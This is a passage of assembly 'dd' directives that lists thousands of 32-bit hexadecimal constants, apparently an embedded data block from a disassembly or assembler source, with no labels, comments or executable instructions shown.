dd 98F030Bh, 0C88E80DEh, 0E16E3C4h, 9219582Eh, 0BE8824E0h
dd 0FF001D3Bh, 3FC8E817h, 709DC3h, 65538979h, 84C49B82h
dd 3AC0FF1Fh, 2DBDF240h, 0E2BA1DBFh, 5128097Ah, 4680037Bh
dd 622FF482h, 0A8E4D300h, 92866849h, 3EA600C7h, 7674473Ah
dd 0FB00FA0Bh, 0F6DD8A26h, 3C5CDh, 8792CFB8h, 0CCB6D523h
dd 6B163C00h, 0E62B2E28h, 0B0AD0040h, 50843E57h, 0AA007D2Fh
dd 54EB776Dh, 0DDE7A0h, 0A344DE95h, 0D513A7DFh, 0C83C4D00h
dd 0FE412888h, 6209001Ch, 679C2527h, 3A0063F0h, 7D4184Fh
dd 0E7B5B0h, 5627F86Fh, 0D2F9A9EAh, 0D50BAF02h, 0E0F1CE7Fh
dd 900CDA14h, 4491009Bh, 16637A83h, 62716152h, 0E4EAED0Fh
dd 88FEE0DAh, 73C50456h, 0C4F70084h, 23F2052Dh, 1700CB4Bh
dd 0D7CEB560h, 38D5A5h, 549EC122h, 6885FF63h, 66078E01h
dd 4A67BD23h, 6994D0h, 0F43E5626h, 1C90E8Dh, 72343F00h
dd 9F9915ABh, 61030E8Eh, 18A7583Eh, 638570BAh, 0D6E62CC3h
dd 0E7B45200h, 0AF2048ADh, 0D4680098h, 0FB0BF273h, 0C73F66F1h
dd 305E8070h, 0E13D27Ah, 0D78116A3h, 0DE5600CEh, 8421D1C7h
dd 4C970800h, 7CE99BA1h, 3B2300CBh, 4886739Dh, 7900625Eh
dd 64749F0Eh, 1F6F6CC4h, 406A3AFBh, 0C83DA470h, 6D02BB8Dh
dd 0AB228761h, 165660EBh, 9F0FBh, 6B7AC1D0h, 0A343BA24h
dd 0D8716DF4h, 3BD95800h, 78161251h, 0C0BC265Eh, 70E30076h
dd 9D053EEDh, 8CDBA201h, 82192939h, 0B8745FD4h, 5AC6000Bh
dd 492F666Eh, 0E4006552h, 0BBE59FEh, 7F228E8h, 16130E3Ch
dd 33DC20B9h, 0BF740855h, 0C430E100h, 56C538BEh, 9D1E0019h
dd 0DFB6D9CCh, 0D800B92Dh, 730B8685h, 1D463707h, 959A15h
dd 8DF73DF1h, 5E005BE1h, 0EC6334FFh, 759941h, 3B9CEBBFh
dd 9F854743h, 81948001h, 0B8293F89h, 0FC117E30h, 9254007Dh
dd 7B318A2Eh, 97006EF5h, 0ED76702Fh, 40E1CBh, 873F4543h
dd 0EC5F73B2h, 0B99DE000h, 0E8F3AE97h, 5D563B30h, 4A246101h
dd 0CC1D025Ch, 0F10ECFA0h, 40F40410h, 4F94EC0Ah, 6E800188h
dd 4AACE175h, 1C86D0C0h, 0A7C60C00h, 549F6619h, 0E6A60069h
dd 36B7F12Bh, 0A907EC67h, 93787A98h, 0D034D951h, 3E32D370h
dd 0A703434Fh, 379C35ACh, 38E204D8h, 0C4708800h, 0A41F806Eh
dd 15670053h, 7FC9DC18h, 0AB00C33Dh, 0B873CA42h, 0EEAAFD9Ah
dd 0F6AD009Fh, 48E5B460h, 4100D5C2h, 3085C1AEh, 64714Fh
dd 5F5EBDCBh, 0BCDC2798h, 8E003B71h, 8DE8E73Dh, 721E1B7Bh
dd 7DBE0096h, 0CB41C95Eh, 0E900301Fh, 0FD740722h, 0FB3946h
dd 77E413A5h, 7926F749h, 3D94D30Fh, 3481E01Fh, 806F37h
dd 998678C3h, 550E2DCCh, 7744F600h, 9B5660F3h, 0B50600BDh
dd 8D8AC9C6h, 3E2E435Eh, 381DCE0Bh, 0EDC1755Ch, 403FB209h
dd 50B5C4D4h, 39DE5D0h, 844A7E1h, 1CB058A8h, 0EC017087h
dd 0E39AA5BDh, 0D1DCABCCh, 0DB133C43h, 3A0B4F80h, 195F0F78h
dd 0BDBAE83Bh, 55838040h, 0C420A290h, 84D102B9h, 0EEB2ECD8h
dd 5CD4B4E0h, 0E4688700h, 7155BF6Ah, 9AEB007Eh, 0D1DE5DD6h
dd 0B8F417FDh, 4E6E0200h, 252A3391h, 27F1001Ah, 8279E62Dh
dd 0F300CB57h, 0B3A10B43h, 1EB284A6h, 401116A3h, 7ADC2502h
dd 4B1C214Fh, 7D801A53h, 0F6B53368h, 47F128E8h, 0ADFE00F1h
dd 6697C050h, 103F9D4h, 2F436A64h, 7524D88Eh, 99550792h
dd 90127120h, 25417BA1h, 0D14A7C0Fh, 0EB3CC0C3h, 0E85406h
dd 3728261Dh, 9AD84EAh, 9D017800h, 5B9CA320h, 4821001Bh
dd 3A0D3CD3h, 4F00E6C1h, 7D633D62h, 5DAC95h, 0A7CF1DDBh
dd 0FFFA4739h, 76AE6B03h, 0B3D1C909h, 0BC61883Eh, 47CC0035h
dd 0B055A87Fh, 1E00E846h, 67091698h, 0E6E1DCh, 0F984AFEDh
dd 0F5E2EE1Ch, 0F7A64100h, 42DB829Dh, 66C63D13h, 6F615000h
dd 14ABBEBAh, 0A1394D00h, 0E69AA7CDh, 0C74F0778h, 709F8FD5h
dd 0BD16F321h, 0C53F1D00h, 0E3856A6Bh, 29A8136Fh, 92C0019Bh
dd 3BA3367Eh, 3F73A0h, 4C700EAEh, 2C21488h, 0BB675E07h
dd 0DAA0129Ah, 0F59278h, 1B7B3AEh, 2AED0C19h, 77003A7Fh
dd 0D5D2AA89h, 0E6DC8E0h, 68DABB59h, 2BD74EC3h, 3047A1E8h
dd 56526A00h, 88EDB471h, 9610001Ah, 0B9383D5Bh, 0A009E0Fh
dd 0FFF93E2Eh, 343ADBAh, 0B277D253h, 35E8F745h, 0B072E3ECh
dd 1AF88A00h, 0CDABEBB8h, 0FF73A1h, 8D503507h, 813E8810h
dd 2600D571h, 945FB0DBh, 0FC20148Ch, 445000FCh, 0DEC0054Eh
dd 0CE006B29h, 89ACFA56h, 45B5C3h, 0BAE4D87Eh, 6C6F9204h
dd 9F12C00h, 44BBA634h, 1AA7DF7h, 5C43350Eh, 0E492243Dh
dd 7F0076FBh, 7ED28861h, 1F8434BFh, 0D73A2022h, 40911DC8h
dd 0C6565B8Eh
dd 0E70062E8h, 0C0B389B2h, 3E8384A7h, 0DB8007BFh, 282D686Eh
dd 0C10033CFh, 0C5E32CDCh, 910561h, 0FB47E671h, 0AFE2C28Bh
dd 809F1B3Dh, 0A32FCE76h, 70C7C6E7h, 30A71FFh, 8A7BA9FBh
dd 0CFF05D33h, 43007AB5h, 0F4E64A3Fh, 0D6BA02h, 6DD35F42h
dd 0E8861507h, 0C7EF2400h, 0A27E54C4h, 32E50029h, 7601D2D3h
dd 6100A7ADh, 67D7172Ch, 7EB12FF2h, 0A3B033h, 6E8D72FFh
dd 0EB3D5999h, 4D65DA00h, 14C7D1E5h, 91F4011Eh, 0B324BF4Bh
dd 0D64EC097h, 5C003DE8h, 14BAD001h, 3DCA33Ch, 2DC3BE3Eh
dd 32F82656h, 9721094h, 8CE09200h, 0BEF55785h, 0E4CE24DEh
dd 769127Ah, 0B0184E62h, 0C9922AFAh, 8075541Dh, 0E001356h
dd 0D664925h, 0D6953062h, 89AF6FE6h, 0DF763500h, 784F1104h
dd 6D42003Ch, 6CBEE236h, 7AF29F48h, 0F520B100h, 0F2758A1Eh
dd 707E071Bh, 0D0C75056h, 11D06B67h, 3088B501h, 2D83908Ch
dd 5BC480DFh, 854839EFh, 70031E80h, 0D4DE57DFh, 0C561020Fh
dd 3028C02Ah, 0BF2DD09h, 14C8A469h, 83AB8E80h, 33ECB66Ch
dd 0E0BB4200h, 0BD2EA823h, 4EB10004h, 6F0F6D78h, 7F00CBE1h
dd 3E758B5Dh, 2282Fh, 781A9553h, 4723F84Ah, 0AE5EAB00h
dd 8D40D9C6h, 8ECE5h, 507D9AA4h, 77132331h, 0C72DA800h
dd 1F03C9B7h, 0EEC80093h, 6426827h, 56003F48h, 0BCDEFF0Ch
dd 26DDB3h, 82A3160Fh, 9CD0BF14h, 98641700h, 20CF813Ch
dd 0B22B004Ah, 0EF73EABBh, 0DB1769DDh, 0F6078415h, 0CBA066E6h
dd 0E4D9ECB0h, 2E0200ACh, 0C29D1AB8h, 1E38E297h, 0C794837Dh
dd 0C032EE6Fh, 1266DFCh, 0E70A412h, 0FC9A0744h, 2F002324h
dd 0AEB3B94Ch, 0E858C442h, 68AD3E2Ah, 0F35C000h, 5B536644h
dd 0B5E99603h, 0F290C4ABh, 4FFE40A5h, 0D45103EEh, 7D959D12h
dd 816C8BF8h, 28873A1Dh, 0DDC81180h, 0B80C9B5Ah, 0EF43000Ah
dd 0B9486194h, 0F807C7F6h, 9DDDC310h, 79358B11h, 3960BF70h
dd 0C900E4F2h, 4277BBF1h, 72002816h, 6F81E12Fh, 1FAD5647h
dd 0C90DE0h, 4AA075CAh, 4E90A731h, 0A81D3500h, 0C83E224h
dd 3EE50045h, 0FFBC627Bh, 6C00FBB7h, 0A3B9782Ah, 63C8ADh
dd 0C901D4FCh, 71F13A3Bh, 0ED597A04h, 6EC0AE9Ah, 79C63CEh
dd 0DB3CAC0h, 8CDD9079h, 7207048Ah, 0F7B693A4h, 0BF982583h
dd 0B836DC91h, 1BE5F0h, 689014E2h, 8B0E80F8h, 35ED1800h
dd 0F7EC64B1h, 0CBEA01C0h, 926C79FCh, 82F6B9A3h, 0FDD0183Fh
dd 47D6606Bh, 558507A7h, 50B2A1CEh, 29D3915Ch, 5D22F700h
dd 1432DBE3h, 54A80006h, 0E91ED7BEh, 72003D61h, 5EC3F86Ah
dd 9D5CF1h, 1AF570DEh, 5A9018CFh, 7D2F8F00h, 3BC7327Fh
dd 0B864004Bh, 5ECC776Dh, 8F3F7949h, 10F200B6h, 89F54EF9h
dd 69C61FF7h, 8B42C033h, 6C487F0Eh, 336B138h, 0C0C3DE6Bh
dd 5B928091h, 85A900E1h, 0C6DB899Ah, 0CE0493E2h, 0D5397E97h
dd 674D5EC0h, 47FB033Bh, 0EDBC9A84h, 60D780D1h, 813AB6C2h
dd 0A7F709FEh, 0B7DB00DDh, 0EC7257h, 0DBCDA3F8h, 7A0FC319h
dd 55F4A500h, 0D1AE408h, 888F0FFAh, 3B807E84h, 2346A48Ah
dd 0E993E2C0h, 14723834h, 0ACC5F2D5h, 0DE612800h, 37B6576Bh
dd 0D86A2E00h, 82B72A88h, 7BB20733h, 874EF165h, 9C53904Dh
dd 0F6010C78h, 0E58B80B6h, 0CF305CCFh, 0D52D001Fh, 93EE5F89h
dd 0F490FFA2h, 3BE9D803h, 0F88F859Dh, 0F8D62D6h, 0B7455EB5h
dd 0D20092C9h, 69A27506h, 0CCC78A00h, 2BD57D1Ah, 37F69Bh
dd 3EA399DAh, 0DD15EF0Fh, 0D95C1000h, 0CB208B09h, 0E53103FBh
dd 27026780h, 653CD880h, 78DF3600h, 0B4680804h, 0B8964C76h
dd 0CF53A21Eh, 7D807748h, 0F585F765h, 0FCF25700h, 5E8C45B6h
dd 4E060024h, 476C60E4h, 0DB00E7AAh, 17E8FD13h, 0F6B036h
dd 0D7ADC7C8h, 2A11576Dh, 83CE7C00h, 124AAB14h, 0D4F1FCAh
dd 75824072h, 0BBC32023h, 7DE9F4Ch, 6FDE742Ch, 0F91C0D81h
dd 0FCF1ECh, 0E915C924h, 0A26CE462h, 0EF97B000h, 0BB9A98B5h
dd 0C7550158h, 0DA742E7Ah, 0C966D027h, 0B14BD31Eh, 406EE7CFh
dd 0CD67DF6Ch, 0E0E800D8h, 8FA3389Fh, 0DE00E923h, 90D03BE1h
dd 1EFABF34h, 7F267FFEh, 0C58C4380h, 0C3AC4C7Ch, 4ACCE50Eh
dd 0D134CA09h, 0DCE49800h, 739B7FCh, 1519559Ah, 0C2C03E24h
dd 0FB7F5CECh, 67E7C100h, 8D49FA10h, 1CAC007Eh, 263FA73Eh
dd 0C700DF42h, 0A4C5B940h, 0E2C64E2Fh, 0A7E800D3h, 99280A3Ch
dd 0B528971Eh, 2507D571h, 20353DBh, 3E9072C7h, 0C88689h
dd 0C1A643E8h, 6C5FBC59h, 2F16F507h, 0A0E0379Ch, 75250FBh
dd 9B1A69ABh, 17D1E0D3h, 0A500D443h, 0B7A98095h, 78E7151Bh
dd 0F1B8005Eh, 0A3AD0D82h, 9F003145h, 6C4F8679h, 0FC5DA826h
dd 30E901B1h, 4012B734h, 696870B6h, 50755200h, 80183A67h
dd 93A3000Ch, 11E53410h, 0E000EA97h, 2178166Ch, 0F644DCCh
dd 0B35C7B4Eh, 0BEB17C60h, 801FA508h, 7E400BBFh, 0D74A965h
dd 0CDFE1230h, 210003Fh, 2224649Eh, 13C6140Fh, 88F7C050h
dd 0ECE38312h, 0BEF491h, 99EF1881h, 34A0B530h, 29CB39h
dd 6F6CDB4Bh, 394E353Bh, 681FE70Eh, 0A7468099h, 2B83DC7h
dd 0E8743700h, 9093BFDDh, 915900F0h, 69E61F7Fh, 0CD04684Ah
dd 814E475Ch, 0C9F4CE80h, 7B5F00DDh, 62344329h, 0BA006D5Eh
dd 28EFD06h, 404F47h, 9ACAF9E3h, 0DC0070Eh, 0A09EBD00h
dd 8E57DCCDh, 1F3E0059h, 0BFF52ED0h, 3B1C81E3h, 81BB96BEh
dd 0B36E48EEh, 0C2EC5130h, 0E2940F88h, 4A45BBB9h, 0C06BC7E6h
dd 0E381F17Bh, 6EAD2305h, 5EC04605h, 1382E42Ch, 0C86C0Bh
dd 0AF9AAC9Ah, 9FA12FAEh, 3B68C853h, 86C5F005h, 7780A3DFh
dd 3D59D4Fh, 0D6A8B47Eh, 94B80E29h, 0C4008175h, 3D6D38EBh
dd 742420h, 887DC1CBh, 21D5D2B4h, 2E70431Eh, 619EB940h
dd 7BB199h, 0D8719F47h, 1463C450h, 35224100h, 0A7161AFDh
dd 595C0081h, 0E05D75F0h, 0A500B653h, 94CA2DB2h, 36A46F7h
dd 5F24D1A8h, 70D0BBBDh, 0C173607Eh, 7244E501h, 0F0868356h
dd 576E0F6h, 70B0FDAh, 0E3204CB2h, 3E102AF2h, 0F8D4D600h
dd 0B3E63A52h, 91930086h, 51727555h, 567F6818h, 0D4F5A6A1h
dd 775CB159h, 0E3A4008Eh, 82CED145h, 0ED6501A2h, 3E2ED7AFh
dd 0D24AE0E2h, 0FB558800h, 7697335Dh, 6B1A0090h, 0F9A0A90Bh
dd 0A003B6Ah, 8C0F7150h, 1187E52h, 0B7A45C78h, 0F0410D4Bh
dd 5A00684Dh, 2409F28Eh, 39E20FDh, 0F0E2795Ch, 60C0E636h
dd 38003C59h, 346CF83Ah, 26D190h, 0AE77A802h, 6185674Ch
dd 539D1903h, 0E070F798h, 5F64B6h, 141340D7h, 0B793D3B2h
dd 0DBD40100h, 0E05852BDh, 27EC3B96h, 90FC4700h, 7A519E84h
dd 0DCB6700Ah, 0CE0E912Fh, 358FA0A5h, 3CF02499h, 9A81BB10h
dd 4D64AEDFh, 3DD0EFE3h, 0CA00EAACh, 0EF32CC18h, 62B9B0h
dd 306D0D55h, 0BE9398A5h, 1041000h, 330F5D4Bh, 0AFFA00DFh
dd 7ADE1C63h, 0FF00F44Fh, 705E3DBBh, 71760Bh, 791B0CC5h
dd 0E315411Ch, 94DF2D2Ch, 51ADB303h, 0B84CFBA7h, 1F0919h
dd 16532C4Ah, 57EAA296h, 1D83AC48h, 24807372h, 0ED7E4C79h
dd 367BEFh, 3CA65046h, 2C25BB30h, 8392D900h, 0FCACDDAFh
dd 0FBDE002Eh, 89B29C18h, 0D37BAB32h, 22A38305h, 0C0AB1117h
dd 0A7C3AEDBh, 79E28200h, 475D96F4h, 8AEA14h, 3785A5CCh
dd 0B60D17ACh, 51D2000h, 3BBC4AF9h, 0EEE01Eh, 11AE9179h
dd 0CC486865h, 410FCD00h
dd 1D7235F6h, 554703BBh, 8117EA33h, 5BAF5800h, 95C59BFEh
dd 7F78076Bh, 438E678Ch, 0FDF84DCEh, 61009482h, 40B2E5B4h
dd 0EA4EA4h, 5817B89Bh, 0AF4A3998h, 0F44BB600h, 3B87B49Ch
dd 0A5090008h, 0DA511542h, 7AF2DCBFh, 6F00AA70h, 0C3655C8Ch
dd 0ADD714h, 0EA8AB512h, 0C92D8835h, 0A4D07000h, 157DEC1Ch
dd 0EC6779FCh, 0F44E582Ah, 0A3B04B30h, 0FF008EDCh, 0D17CE851h
dd 3E954B7h, 0A25705D8h, 19DA52CFh, 7D3213C0h, 0F0495D00h
dd 0DC1F6740h, 0A3113D29h, 0A0039F80h, 4597C832h, 0B000AB75h
dd 2427F3F0h, 234B5Bh, 0C0678F52h, 0ED73A750h, 2A08881Ch
dd 6026BC4Fh, 1427BAA8h, 6BDA00B6h, 3BD30BAAh, 2B000760h
dd 0FCD9E77Ch, 7022B3h, 1701A694h, 0E36290FEh, 250390Bh
dd 0B580DF0Bh, 0EC9B618Ah, 0D838B9E0h, 0E84300B8h, 0CEBA0E31h
dd 9F3700FAh, 0A0E90642h, 7E0F38B9h, 40885B7Ah, 608EF5C8h
dd 0AA8C0FFEh, 3F1178h, 2E559291h, 2200F831h, 45614AE7h
dd 84B633h, 3019DDFh, 0D30FD4B7h, 94E6AFFEh, 42953200h
dd 0C427286Bh, 5F7550h, 5CE38F82h, 48121E77h, 316B100h
dd 63C2F532h, 0AE250976h, 0B7807079h, 5F15A8D8h, 0B000F70h
dd 91E60C3Bh, 388EBB34h, 2D002370h, 0A7296AA0h, 5000E39h
dd 0D7CE5827h, 16A65Bh, 0DE147AA5h, 0E75516Ah, 4D037DE8h
dd 76C3CEF3h, 456B8037h, 41E9009Eh, 7788AF8Bh, 0E212344Ch
dd 780021E8h, 817DC9EEh, 48FAF5h, 6B7884E9h, 8556D731h
dd 820088E8h, 0F335C1A4h, 0EB5D7913h, 7DF8DE8h, 0A3CB1565h
dd 707BD33Fh, 4F91A9C8h, 60AA6700h, 5B661852h, 8A80739h
dd 105F7315h, 0B8A51A53h, 0C9742BE6h, 47E6800h, 88C32667h
dd 0F84A3838h, 63804DBEh, 0B6EE841h, 590021DFh, 19AC2F5Dh
dd 1AD2A1h, 13CAA7AAh, 7EEF4A6Eh, 7A520700h, 744CC0C1h
dd 8988008Eh, 37EEA63Eh, 67E1C71h, 49774B2Ch, 0DE40931Fh
dd 19DCE702h, 0C562008Dh, 16B92CBFh, 3C00B074h, 0D8DE0D52h
dd 0AFB301h, 98CDEE3Ah, 868F0B3Dh, 301AE7Ah, 135DE89Dh
dd 0C0E45616h, 28071795h, 0DFA00084h, 0E41DC52Fh, 0A5247004h
dd 0C0FF822Dh, 0A2801243h, 20072E07h, 80BE5CC0h, 0DE5B084Fh
dd 7AE6073Ch, 77473DA7h, 50A8C022h, 0C900B2C5h, 73C389BFh
dd 4E2D37h, 940C5CD3h, 0C153117Dh, 0ADF40600h, 68DB7C95h
dd 0DE90FB3h, 7F40A109h, 7A83BA69h, 57350F00h, 0BD23F3B1h
dd 0A89F000Ch, 0B5DD58A9h, 0EA0D5121h, 20204F61h, 0B8467EC4h
dd 4DCA00D9h, 0BCFBF7ECh, 77000A42h, 0B4967BB9h, 38DB650Bh
dd 0A380E30Fh, 0ED56A9EAh, 9D0077AEh, 954C0E42h, 0D5AB1Ch
dd 0B0A22EB6h, 5ECD9C5Ch, 0C1100400h, 478CC3DFh, 34CF2DCh
dd 5258F83Eh, 9F9097ADh, 2600D491h, 0F36E3F24h, 2838CDh
dd 0BDCE72D8h, 95AA2376h, 0C800D570h, 93D4F48Bh, 3CEAE7h
dd 76565A34h, 83DF1C8Eh, 15B68200h, 9632C57Fh, 25D70090h
dd 434F71CBh, 0D5008B1Fh, 70EBC88Ch, 0D1E7Ch, 0C4F95E03h
dd 13ABCC32h, 0D5FD1100h, 29065743h, 0E17A009Eh, 8FB1BB91h
dd 3509E9E5h, 0BF7D54h, 0BC29232Ch, 2C84013Fh, 0F5FA0119h
dd 0A76AC424h, 6DA33B07h, 0CA207D12h, 927A62h, 200AD2D9h
dd 9590A707h, 2FCA100h, 0BE541B01h, 0DDED00B1h, 19D3C22Bh
dd 9400592Fh, 7769440Dh, 11718C4h, 7BB07287h, 0D1A9C7FBh
dd 57352007h, 0A300AE7Eh, 65C8EF3Eh, 0F7E82Ch, 2EB55550h
dd 20705143h, 0F8A4BC00h, 147B4015h, 0AB44008Eh, 5C2EA848h
dd 20068CEh, 2BE97F2Ch, 0E19EEEh, 8ECDC25h, 40D42A04h
dd 5CC1C501h, 3D686311h, 8170C4h, 0B988F16Ah, 1CF2320Bh
dd 0BDBF8A00h, 9C7D0982h, 42B000CCh, 0DEC5A1B7h, 0F203C7D7h
dd 0DB73515Ch, 95D6D05Fh, 447A0713h, 60656793h, 0EF64701h
dd 513A7B00h, 8EF7BF41h, 3FF41C6Fh, 0B9C2434Fh, 6ED8BA36h
dd 0AF025F1Eh, 0E8B5507Eh, 6D0EE0D9h, 204C006Ah, 4DE554F6h
dd 0D707403Eh, 8CB64EB9h, 0F392F70h, 5F8200B0h, 0EC73BCC4h
dd 0C00E744h, 7BFCA2ACh, 24B9DBh, 6B63AD50h, 0D66C5689h
dd 0EC5B331Eh, 0C0C649C7h, 748FB250h, 2F40007Bh, 901BD867h
dd 0F900246Ah, 0C6FCC9A4h, 1D587C0Dh, 405C2CD9h, 708B8651h
dd 3F39416Dh, 0FB62002Bh, 5E75F12Dh, 75949084h, 649B3E43h
dd 1BA98B87h, 8DCF2072h, 38008994h, 9F922A48h, 0FDA37ABh
dd 4A5F0D5h, 301F2580h, 0EE00462Ch, 780EAA20h, 0E6B4B3DEh
dd 2C200EBh, 9CF8A9B7h, 0F013149h, 2C4CF143h, 13F8EE85h
dd 16E0009Eh, 9AFE440h, 0ED701B38h, 92432000h, 24C51CD1h
dd 0E48E0FC9h, 878099D7h, 15A90CA0h, 60C67700h, 86570981h
dd 79D700CBh, 0BB92FB6Eh, 0C3006655h, 0BA8F6DF8h, 3C1AFDh
dd 0E914C569h, 0E6727734h, 0B3E8B107h, 4DB05BCCh, 0D412F4h
dd 61628009h, 7CBF761Bh, 0A2EA91EEh, 0A9567B00h, 275DB4A1h
dd 0E9570065h, 4B6DDBD5h, 0E800B38Dh, 0FC55314Ah, 0B05D296h
dd 8FD94748h, 0A3B7EA01h, 6252603Dh, 9EC3F903h, 0B0B67F91h
dd 8C6983h, 0CF20DA8Fh, 9B8ADC5h, 0BFDD5200h, 1E5C4018h
dd 0E48A1B96h, 9CB8D603h, 0A1002C7Ch, 6FA93B3Eh, 0E6738Eh
dd 0F6D724F9h, 611E97E0h, 0CDD87200h, 0C43DA57Fh, 7BF62Ah
dd 0DC583F95h, 751FF385h, 1446739h, 33A6DE07h, 8DF0C7C3h
dd 89680052h, 0ED31A0C8h, 5003D49h, 1407C2D8h, 1DD61EC1h
dd 22B997h, 0A737A9E7h, 543BF488h, 128600A2h, 9373E8BBh
dd 0D1C6006Bh, 0EF11C3Bh, 4701DCE2h, 200472C3h, 1FC1922Fh
dd 0FB24D30h, 0B59E3BBFh, 0B2B49E3h, 0CFBD3C98h, 40767F0Bh
dd 0C59B8011h, 2C7EAh, 700964D8h, 9E22609Ah, 6AA58D00h
dd 732996B2h, 0BD6600E1h, 7E9861C0h, 4F0112EAh, 0E3316516h
dd 11CC4481h, 0F067002Bh, 0A419ECAAh, 270F7BC5h, 60C8F9C6h
dd 0DA09B2E4h, 0C1891FEDh, 2887C09Ah, 52C6100Bh, 34998F00h
dd 39270AC9h, 234807B3h, 606E4D45h, 0E080686Fh, 0D70033E2h
dd 2A27930Ah, 1AE8F9h, 0F4F35BD5h, 54C4E4E7h, 501EC0ECh
dd 2EC0A2F5h, 0B598FD95h, 64C20035h, 206E4724h, 0CB1F17C3h
dd 0E07E81Ch, 605EEC33h, 0C6CE040Dh, 99020082h, 0AAC3F613h
dd 40746270h, 8049513Ch, 0FF6E9824h, 6996F5h, 0D350E960h
dd 0F08BA8CAh, 0D14E520Eh, 0B2E1E0EFh, 1C2BB3A7h, 1911441Fh
dd 0D0CAD43Fh, 8871DD98h, 0DF0B23F8h, 694347h, 742BBC1Dh
dd 0FCC6075Bh, 2767F886h, 0A8B5D14Ch, 0D4562137h, 7D1ECE01h
dd 0F401AFFh, 0AAF948E1h, 0A36500ACh, 1C5FDD16h, 0DC004953h
dd 0BCFEF6DBh, 3941C8h, 0AE297B2Bh, 0E7A6430Bh, 4D00A198h
dd 553FC1FBh, 405ABAh, 0CFC67356h, 8B20E593h, 5023200h
dd 9DEBF850h, 0D4F006Bh, 5C5E23B9h, 6D00561Ah, 0F960A3D4h
dd 2C259F31h, 3DB0A490h, 871B1Fh, 94A0EBF7h, 77E43CACh
dd 0B0234700h, 0D989CC98h, 7F0B0060h, 867BE5A1h, 28033544h
dd 15BC7AF3h, 94E8066h, 30C500A3h, 9DBD34B5h, 2B0094C7h
dd 3F42D120h, 1F7690F8h, 9C5671CEh, 879E4048h, 821694B7h
dd 9AD50D00h, 2CF359B1h, 0DE9C00B6h, 0EABA6CCAh, 5A03638Bh
dd 0CB32B588h, 34A0E0FBh, 925E01D6h, 0C3B3A281h, 1C9CF4EEh
dd 94AEFA0Eh, 5259E063h, 1C783DCDh, 0DBCA2h, 0B314C7BDh
dd 0BE00C6F7h, 4517FCACh, 0AF9E69h, 2C0AB22h, 0EFADD473h
dd 2D6C5F00h, 8EFBB637h
dd 0FD9401A1h, 32401331h, 0F96AE0B8h, 570B5h, 8B6C20D0h
dd 4124CC1Ch, 573E2507h, 9240A80Ch, 6D5BDCh, 0B8F7D097h
dd 0E92C82D6h, 0A068D305h, 2C80BE36h, 0FE7B9DCFh, 1E2B017h
dd 2AF2301Ch, 0FC25C23Ah, 200097B0h, 40FEADF1h, 6D31B8h
dd 0B941B61Ch, 0EBEE51A5h, 0E5DF3Eh, 389A635h, 0B0F29BF5h
dd 4F90EA0h, 0A981CC0Bh, 0C0210F12h, 0D3008EDCh, 0CD09A53Bh
dd 0B5A2B0h, 9B61807Bh, 0B376F211h, 0A6A15C00h, 5D752381h
dd 6AF41Fh, 0C242559Ah, 9777E1DFh, 3E40B200h, 13CFC817h
dd 7C9038C3h, 9EBA7681h, 0C441E86Bh, 0CD00DB9Ch, 0D1A0E5EDh
dd 791D83h, 0E2753895h, 0D5DCB582h, 0E646C003h, 952F12E1h
dd 98136283h, 39A4C183h, 0F300517Bh, 10E78157h, 9E00DBC8h
dd 0CBC45DD7h, 718EB61h, 9B658F0Dh, 2FB850F5h, 2E0006BBh
dd 0B7441C82h, 0ACDE36h, 45FE87F4h, 3FBF3B40h, 0E4C2E200h
dd 4328F6FAh, 2DAD0221h, 1E917C69h, 9FC780F7h, 7DA834h
dd 825224E1h, 3A5F2F5Bh, 0D91CFDF2h, 51C00616h, 0F1B8B935h
dd 0F820F9Ah, 0EC00A99Bh, 0FBAE4111h, 5F66C800h, 3317FAA1h
dd 0F7998CBh, 513B85F2h, 0C8678E1h, 0BAEBCBAAh, 4E8853D3h
dd 0E0FD0A8Eh, 0A060B9D0h, 49840758h, 69542490h, 8E0E3A1Eh
dd 0A540E375h, 5AE381Eh, 702E0200h, 0F70DA4E4h, 3D7435h
dd 76EEF184h, 0CA6D8DECh, 3B3BB00h, 0F45CB2C0h, 628051Dh
dd 0C03CB8F8h, 0E285CE1Eh, 5DCD8400h, 0FFA8179Eh, 8079004Bh
dd 9548BE3Fh, 8D00DEBBh, 2E0A2AD7h, 0B64F7Fh, 8310987h
dd 7DB9E782h, 6D0199FCh, 6A075AABh, 49F0CAA4h, 6EE900A1h
dd 709C42CDh, 7E031B05h, 66A71453h, 0C168D854h, 0E7B1003Ch
dd 5EB50671h, 0C7E4B35Fh, 0E68ED900h, 0E3664DDFh, 6F17007Fh
dd 5123AD1Fh, 6E3F9A71h, 1818354h, 0F8F2C22Bh, 0AA1CAEh
dd 45BB3E09h, 8F9C8D5Ch, 0E2B9A500h, 64297D1Dh, 14AE4E5h
dd 5F43EA95h, 0F7846A0Ch, 24BD15B0h, 0E3036F7Eh, 38B830AFh
dd 0B850EBD5h, 3957A6h, 0E0D43661h, 0A8ED6327h, 79DA7E00h
dd 6ACAA994h, 3FBE980Fh, 0C580723Dh, 89D15FE6h, 0BF00395Dh
dd 402795E8h, 0F56442Bh, 0BAE1AF30h, 0D7B901F3h, 0E8657097h
dd 9A012B9Ch, 4BF2C60Ah, 668F461Ah, 29200951h, 6E8C178Dh
dd 271BC800h, 1FA9FFDCh, 0EE5DB042h, 6B1E0074h, 17CFAF12h
dd 130060B6h, 7C4A873Dh, 0F9ECCAh, 0CED55D94h, 75D08AFFh
dd 0B1ED4D07h, 0ED064B9h, 6734A8h, 9D3BA6Fh, 63B0B436h
dd 529CB20Dh, 0A0E02822h, 792907B7h, 0FF4F8DD2h, 76AA3C80h
dd 0A1183B83h, 88528A61h, 939200BFh, 0D22CDC03h, 5E12E97Dh
dd 0BD006C0Fh, 758FC176h, 44AA00DDh, 5603A492h, 640077A5h
dd 59F783FAh, 3CB5EF06h, 0F304B999h, 80C98898h, 0FCD3C10Eh
dd 0D425FFA0h, 648CAF09h, 0A56CC080h, 42C8002Dh, 0E497F9F3h
dd 230031C9h, 96BF3C6Ah, 5F7F152h, 0FABA916Eh, 113D80ACh
dd 0D20F2DE2h, 0A0596948h, 4F214229h, 0E963B45h, 4B510900h
dd 4D54F8B2h, 0AF3C6D01h, 55944788h, 24C393E8h, 353F685h
dd 9A739764h, 0B977DDB0h, 21A08200h, 0FBD26C05h, 0DE1D00B8h
dd 0F42F3D4h, 30F713C8h, 0A600B33Fh, 655A3B10h, 887951h
dd 0AD4E5FEBh, 62936059h, 6BF11900h, 46633AC7h, 1D4D00FAh
dd 658E7D69h, 2400BAE9h, 8958B72h, 0B0D2838h, 0FC318218h
dd 0EF7E80D5h, 0B2782Dh, 0CED4DB59h, 99C90108h, 0BEC34Ch
